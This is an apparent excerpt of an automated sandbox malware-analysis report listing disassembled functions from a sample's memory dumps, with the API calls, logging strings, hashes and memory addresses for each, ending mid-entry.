Opcode Fuzzy Hash: 67fe9a9e212230c1ac7a02241026cc322f159ac854deddccca5ffee0e1b4d977
Instruction Fuzzy Hash: 09F01760F0C44791FB209B10E889BF46326AF60B84F840037D4DD4A2F6EF5CE5898780

Function 00007FFE0EB4296E Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 26networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 00007FFE0EB42980

Part of subcall function 00007FFE0EB49DC2: fwrite.MSVCRT ref: 00007FFE0EB49E6E
Part of subcall function 00007FFE0EB49DC2: fflush.MSVCRT ref: 00007FFE0EB49E7A

Strings

Done, xrefs: 00007FFE0EB4298A
[I] (%s) -> %s, xrefs: 00007FFE0EB42998
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE0EB429D4
[E] (%s) -> WSAStartup failed(ret=%d), xrefs: 00007FFE0EB429BF
net_init, xrefs: 00007FFE0EB42991, 00007FFE0EB429B5

Memory Dump Source

Source File: 00000017.00000002.2982612085.00007FFE0EB41000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000017.00000002.2982583990.00007FFE0EB40000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982645078.00007FFE0EB53000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982679325.00007FFE0EB5C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982718497.00007FFE0EB5F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982747189.00007FFE0EB60000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0eb40000_main.jbxd

Similarity

API ID: Startupfflushfwrite
String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
API String ID: 3771387389-898331216
Opcode ID: 82a45985ff1d02fc9e78d7f76e6229d12296bcb138f8e3f3c5292260bb9d0297
Instruction ID: 182071c45087e78de70cff6335fdedb02e6ea5a137777dcebeb026236f222c30
Opcode Fuzzy Hash: 82a45985ff1d02fc9e78d7f76e6229d12296bcb138f8e3f3c5292260bb9d0297
Instruction Fuzzy Hash: A8F030A2B0874791FB329F14E8453F51290EF507C4F440836D5CD462B9EE1CE5498F10

Function 00007FF6EF6514EF Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 70COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6EF651FD0: GetModuleHandleExA.KERNEL32(?,?,?,?,?,?,00007FF6EF65162F), ref: 00007FF6EF651FEE

_mbscpy.MSVCRT ref: 00007FF6EF65155C

Part of subcall function 00007FF6EF6513CD: strlen.MSVCRT ref: 00007FF6EF6513D8
Part of subcall function 00007FF6EF6513CD: strlen.MSVCRT ref: 00007FF6EF6513F4
Part of subcall function 00007FF6EF6513CD: strlen.MSVCRT ref: 00007FF6EF651400

Strings

package_install, xrefs: 00007FF6EF65158E, 00007FF6EF6515FE
service, xrefs: 00007FF6EF6514F0
[E] (%s) -> Failed(pkg_path=%s,tgt_path=%s,err=%08x), xrefs: 00007FF6EF651595
[I] (%s) -> Done(pkg_path=%s,tgt_path=%s), xrefs: 00007FF6EF651605

Memory Dump Source

Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true

Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd

Similarity

API ID: strlen$HandleModule_mbscpy
String ID: [E] (%s) -> Failed(pkg_path=%s,tgt_path=%s,err=%08x)$[I] (%s) -> Done(pkg_path=%s,tgt_path=%s)$package_install$service
API String ID: 3656010895-1379287937
Opcode ID: 63154ff3bdd97e0373aded726482827ac143fbb49905b81037dd08d23e9506c3
Instruction ID: 71f3ca9b49272de28b885bdd8e30b4e22db2aaadc9f4fd3aee2503a081375ab7
Opcode Fuzzy Hash: 63154ff3bdd97e0373aded726482827ac143fbb49905b81037dd08d23e9506c3
Instruction Fuzzy Hash: 1131A773A0C68793FB109B54E4903EA2365FB84344F800832E64ED769ADF7ED509E785

Function 00007FFE133850D3 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FFE133850F3

Part of subcall function 00007FFE13382072: fwrite.MSVCRT ref: 00007FFE1338211E
Part of subcall function 00007FFE13382072: fflush.MSVCRT ref: 00007FFE1338212A

GetLastError.KERNEL32 ref: 00007FFE13385126

Strings

[D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p), xrefs: 00007FFE13385113
[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu), xrefs: 00007FFE1338513D
module_get_proc, xrefs: 00007FFE1338510C, 00007FFE13385136

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: AddressErrorLastProcfflushfwrite
String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
API String ID: 1224403792-3063791425
Opcode ID: 43ee0e03b75cf9c72b49b9727778b1161a663c20aa97baaba46f6adb6057179d
Instruction ID: 686b8702bd2260e264ce43f13945f55b18f85997c43b6af5057686c0e68ea69f
Opcode Fuzzy Hash: 43ee0e03b75cf9c72b49b9727778b1161a663c20aa97baaba46f6adb6057179d
Instruction Fuzzy Hash: 72F0D650E08E07CAFE158757F8001B952526F24BE4F4441B1CC6E37BB8EE2CE6828308

Function 00007FFE0E1329B3 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FFE0E1329D3

Part of subcall function 00007FFE0E1340D2: fwrite.MSVCRT ref: 00007FFE0E13417E
Part of subcall function 00007FFE0E1340D2: fflush.MSVCRT ref: 00007FFE0E13418A

GetLastError.KERNEL32 ref: 00007FFE0E132A06

Strings

[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu), xrefs: 00007FFE0E132A1D
module_get_proc, xrefs: 00007FFE0E1329EC, 00007FFE0E132A16
[D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p), xrefs: 00007FFE0E1329F3

Memory Dump Source

Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true

Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd

Similarity

API ID: AddressErrorLastProcfflushfwrite
String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
API String ID: 1224403792-3063791425
Opcode ID: 2d80f60a7fc54b633a173b78560123f85385361f390db4834d305d2dc16c8abd
Instruction ID: 09d3e6d66cf2fd00268283aea7d1cb43eec574ce9852986d70e3ab42740fb7cf
Opcode Fuzzy Hash: 2d80f60a7fc54b633a173b78560123f85385361f390db4834d305d2dc16c8abd
Instruction Fuzzy Hash: 9FF08191A0D74782FA516B55A8002E9A251AF44BD4F184133DDEC0BBB4EE2DE966C300

Function 00007FFE126D76B3 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FFE126D76D3

Part of subcall function 00007FFE126D77A2: fwrite.MSVCRT ref: 00007FFE126D784E
Part of subcall function 00007FFE126D77A2: fflush.MSVCRT ref: 00007FFE126D785A

GetLastError.KERNEL32 ref: 00007FFE126D7706

Strings

[D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p), xrefs: 00007FFE126D76F3
[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu), xrefs: 00007FFE126D771D
module_get_proc, xrefs: 00007FFE126D76EC, 00007FFE126D7716

Memory Dump Source

Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true

Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd

Similarity

API ID: AddressErrorLastProcfflushfwrite
String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
API String ID: 1224403792-3063791425
Opcode ID: 7a72d4ed66baca842218f1c7e4dc023994f12581eef7fbbacc79224501802e6f
Instruction ID: fa1d0a4ed8ebb5cc2290f3382b96855f7473159e03676be719b0c7f69369a821
Opcode Fuzzy Hash: 7a72d4ed66baca842218f1c7e4dc023994f12581eef7fbbacc79224501802e6f
Instruction Fuzzy Hash: 8FF0F450A09E8B42FE1B8707FC006B612516F54BE4F0844B1CC9C4B7F8EEACE546C300

Function 00007FFE11EC3D33 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FFE11EC3D53

Part of subcall function 00007FFE11EC1352: fwrite.MSVCRT ref: 00007FFE11EC13FE
Part of subcall function 00007FFE11EC1352: fflush.MSVCRT ref: 00007FFE11EC140A

GetLastError.KERNEL32 ref: 00007FFE11EC3D86

Strings

module_get_proc, xrefs: 00007FFE11EC3D6C, 00007FFE11EC3D96
[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu), xrefs: 00007FFE11EC3D9D
[D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p), xrefs: 00007FFE11EC3D73

Memory Dump Source

Source File: 00000017.00000002.2982869443.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000017.00000002.2982773680.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2982917287.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983003921.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983076043.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983101282.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983157453.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd

Similarity

API ID: AddressErrorLastProcfflushfwrite
String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
API String ID: 1224403792-3063791425
Opcode ID: 76083edb125581580526d7ef43c5a3483c7446e0e7917b6a9b1b563f89cea384
Instruction ID: d5af7b37b381b8709014738417ff9a0be725286547af346e32bfbf8089fcc0da
Opcode Fuzzy Hash: 76083edb125581580526d7ef43c5a3483c7446e0e7917b6a9b1b563f89cea384
Instruction Fuzzy Hash: A2F08C90A0DF1792FF519B8BAD002AB56196F44FE4F4850B1DC6C0BBB5EE2CF6468300

Function 00007FFE0E16BBE3 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FFE0E16BC03

Part of subcall function 00007FFE0E16C852: fwrite.MSVCRT ref: 00007FFE0E16C8FE
Part of subcall function 00007FFE0E16C852: fflush.MSVCRT ref: 00007FFE0E16C90A

GetLastError.KERNEL32 ref: 00007FFE0E16BC36

Strings

[D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p), xrefs: 00007FFE0E16BC23
[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu), xrefs: 00007FFE0E16BC4D
module_get_proc, xrefs: 00007FFE0E16BC1C, 00007FFE0E16BC46

Memory Dump Source

Source File: 00000017.00000002.2982412926.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000017.00000002.2982385098.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982444726.00007FFE0E176000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982471694.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982500156.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982529491.00007FFE0E184000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e160000_main.jbxd

Similarity

API ID: AddressErrorLastProcfflushfwrite
String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
API String ID: 1224403792-3063791425
Opcode ID: 9d1125fae52c8bad3297328e65f99d2f021d6ef7c0b12073a731c8f2c08208cb
Instruction ID: 69f8caa4f9e7428c271b3df3c5f35f8ecb7b449f3fa379ca2ea59ace28603d71
Opcode Fuzzy Hash: 9d1125fae52c8bad3297328e65f99d2f021d6ef7c0b12073a731c8f2c08208cb
Instruction Fuzzy Hash: 1EF081A0A0D74751FA519745A9099A55262AF04FC4F884033DCDD4BBBAEF2CE6468300

Function 00007FFE0EB44D73 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FFE0EB44D93

Part of subcall function 00007FFE0EB49DC2: fwrite.MSVCRT ref: 00007FFE0EB49E6E
Part of subcall function 00007FFE0EB49DC2: fflush.MSVCRT ref: 00007FFE0EB49E7A

GetLastError.KERNEL32 ref: 00007FFE0EB44DC6

Strings

[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu), xrefs: 00007FFE0EB44DDD
[D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p), xrefs: 00007FFE0EB44DB3
module_get_proc, xrefs: 00007FFE0EB44DAC, 00007FFE0EB44DD6

Memory Dump Source

Source File: 00000017.00000002.2982612085.00007FFE0EB41000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000017.00000002.2982583990.00007FFE0EB40000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982645078.00007FFE0EB53000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982679325.00007FFE0EB5C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982718497.00007FFE0EB5F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982747189.00007FFE0EB60000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0eb40000_main.jbxd

Similarity

API ID: AddressErrorLastProcfflushfwrite
String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
API String ID: 1224403792-3063791425
Opcode ID: eb0fdf5a52035e31f9b93b02363c65b3b7edd3b62af9a89ee9e7b579716066ff
Instruction ID: 31962c3a6d2dac2187c317b336da58ed17d02785108a593a6d912458da1d5c0f
Opcode Fuzzy Hash: eb0fdf5a52035e31f9b93b02363c65b3b7edd3b62af9a89ee9e7b579716066ff
Instruction Fuzzy Hash: 40F08191F0A71751FA32AF95E8007B66351AF48BC1F084131DD9C1B7B4EE2CE946CB00

Function 00007FF6EF652283 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,?,00000000,000001FC7A4F13D0,?,00007FF6EF65292B), ref: 00007FF6EF6522A3

Part of subcall function 00007FF6EF652EF2: fwrite.MSVCRT ref: 00007FF6EF652F9E
Part of subcall function 00007FF6EF652EF2: fflush.MSVCRT ref: 00007FF6EF652FAA

GetLastError.KERNEL32(?,?,00000000,000001FC7A4F13D0,?,00007FF6EF65292B), ref: 00007FF6EF6522D6

Strings

[D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p), xrefs: 00007FF6EF6522C3
module_get_proc, xrefs: 00007FF6EF6522BC, 00007FF6EF6522E6
[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu), xrefs: 00007FF6EF6522ED

Memory Dump Source

Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true

Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd

Similarity

API ID: AddressErrorLastProcfflushfwrite
String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
API String ID: 1224403792-3063791425
Opcode ID: b0a6d3e5865f81b89bef5a90978b9687aa28697f4e7b707de482767387c3c824
Instruction ID: 960d4892f4b8a3d42a4e6918d2dad1adbe3078acdaf5f398c868670143f8ab6b
Opcode Fuzzy Hash: b0a6d3e5865f81b89bef5a90978b9687aa28697f4e7b707de482767387c3c824
Instruction Fuzzy Hash: 4BF0F462A1965793FE118789B9003B563197F84BC4F044431EC4CDBB96EE2EE542B30A

Function 00007FFE13382722 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28networkCOMMON

Download Yara Rule

APIs

shutdown.WS2_32 ref: 00007FFE13382730
WSAGetLastError.WS2_32 ref: 00007FFE13382759

Part of subcall function 00007FFE13382072: fwrite.MSVCRT ref: 00007FFE1338211E
Part of subcall function 00007FFE13382072: fflush.MSVCRT ref: 00007FFE1338212A

Strings

[E] (%s) -> shutdown failed(sock=0x%llx,chan=%d,WSAgle=%d), xrefs: 00007FFE13382777
sock_shutdown, xrefs: 00007FFE1338273E, 00007FFE13382770
[D] (%s) -> Done(sock=0x%llx), xrefs: 00007FFE13382745

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: ErrorLastfflushfwriteshutdown
String ID: [D] (%s) -> Done(sock=0x%llx)$[E] (%s) -> shutdown failed(sock=0x%llx,chan=%d,WSAgle=%d)$sock_shutdown
API String ID: 2143829457-932964775
Opcode ID: 81c7785444ec93e42f33436c825c597045846b0bfe35188d8e25685cf7b0d14f
Instruction ID: 47999a3aa1e74137f2177052dbea8fe9dcfda6902f05f2f31c157603a3c67a2a
Opcode Fuzzy Hash: 81c7785444ec93e42f33436c825c597045846b0bfe35188d8e25685cf7b0d14f
Instruction Fuzzy Hash: 33F03061A0CD03CDEA506B17E8440B95692AF75770F9442F2E97EB65B19F2CA587C308

Function 00007FFE13385154 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FFE13385162

Part of subcall function 00007FFE13382072: fwrite.MSVCRT ref: 00007FFE1338211E
Part of subcall function 00007FFE13382072: fflush.MSVCRT ref: 00007FFE1338212A

GetLastError.KERNEL32 ref: 00007FFE1338518E

Strings

[E] (%s) -> Failed(name=%s,gle=%lu), xrefs: 00007FFE133851A1
[I] (%s) -> Done(name=%s,ret=0x%p), xrefs: 00007FFE1338517D
module_load, xrefs: 00007FFE13385176, 00007FFE1338519A

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: ErrorLastLibraryLoadfflushfwrite
String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
API String ID: 4085810780-3386190286
Opcode ID: a7ec13649a17c9f296edd1ddf330fe53298f0f0572134f32d410f2f50dfae7a0
Instruction ID: de919d2a3f9f4052b33fa6b8bec88dbb316749ce1051436b5da056816c0fe53c
Opcode Fuzzy Hash: a7ec13649a17c9f296edd1ddf330fe53298f0f0572134f32d410f2f50dfae7a0
Instruction Fuzzy Hash: 19F05E50E0AE07DDFE16A757AC404B822515F35BE4B4802F5CC2E77BB9ED2CA986C308

Function 00007FFE0E132A34 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FFE0E132A42

Part of subcall function 00007FFE0E1340D2: fwrite.MSVCRT ref: 00007FFE0E13417E
Part of subcall function 00007FFE0E1340D2: fflush.MSVCRT ref: 00007FFE0E13418A

GetLastError.KERNEL32 ref: 00007FFE0E132A6E

Strings

module_load, xrefs: 00007FFE0E132A56, 00007FFE0E132A7A
[I] (%s) -> Done(name=%s,ret=0x%p), xrefs: 00007FFE0E132A5D
[E] (%s) -> Failed(name=%s,gle=%lu), xrefs: 00007FFE0E132A81

Memory Dump Source

Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true

Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd

Similarity

API ID: ErrorLastLibraryLoadfflushfwrite
String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
API String ID: 4085810780-3386190286
Opcode ID: 0c1ec81c012836d593d8cfeb6e880fcc37db11f95d33002ca5ace1c55a727c96
Instruction ID: b91a66dafe356c0482cc49bb4f90dc415e874de0249b6661afc9b59f9a6389de
Opcode Fuzzy Hash: 0c1ec81c012836d593d8cfeb6e880fcc37db11f95d33002ca5ace1c55a727c96
Instruction Fuzzy Hash: 44F08251F0AB4782FD61A766A8405F83750AF49B90F480433CDEC27771FD6CA996C300

Function 00007FFE126D7734 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FFE126D7742

Part of subcall function 00007FFE126D77A2: fwrite.MSVCRT ref: 00007FFE126D784E
Part of subcall function 00007FFE126D77A2: fflush.MSVCRT ref: 00007FFE126D785A

GetLastError.KERNEL32 ref: 00007FFE126D776E

Strings

[E] (%s) -> Failed(name=%s,gle=%lu), xrefs: 00007FFE126D7781
[I] (%s) -> Done(name=%s,ret=0x%p), xrefs: 00007FFE126D775D
module_load, xrefs: 00007FFE126D7756, 00007FFE126D777A

Memory Dump Source

Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true

Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd

Similarity

API ID: ErrorLastLibraryLoadfflushfwrite
String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
API String ID: 4085810780-3386190286
Opcode ID: d66374e4bdbea6f61e08899def35e8317f9e7e6149a74294acc491db3abd8399
Instruction ID: 479be8918d2a4963844eaf5b632e46b728e71d411bf1bb6aaeb04c34440b0137
Opcode Fuzzy Hash: d66374e4bdbea6f61e08899def35e8317f9e7e6149a74294acc491db3abd8399
Instruction Fuzzy Hash: 47F03A14A4AE4F42FE5B975BAC508B412506F59BA4F4918B1C84C163F5FD9CA6468301

Function 00007FFE126D1462 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28networkCOMMON

Download Yara Rule

APIs

shutdown.WS2_32 ref: 00007FFE126D1470
WSAGetLastError.WS2_32 ref: 00007FFE126D1499

Part of subcall function 00007FFE126D77A2: fwrite.MSVCRT ref: 00007FFE126D784E
Part of subcall function 00007FFE126D77A2: fflush.MSVCRT ref: 00007FFE126D785A

Strings

[E] (%s) -> shutdown failed(sock=0x%llx,chan=%d,WSAgle=%d), xrefs: 00007FFE126D14B7
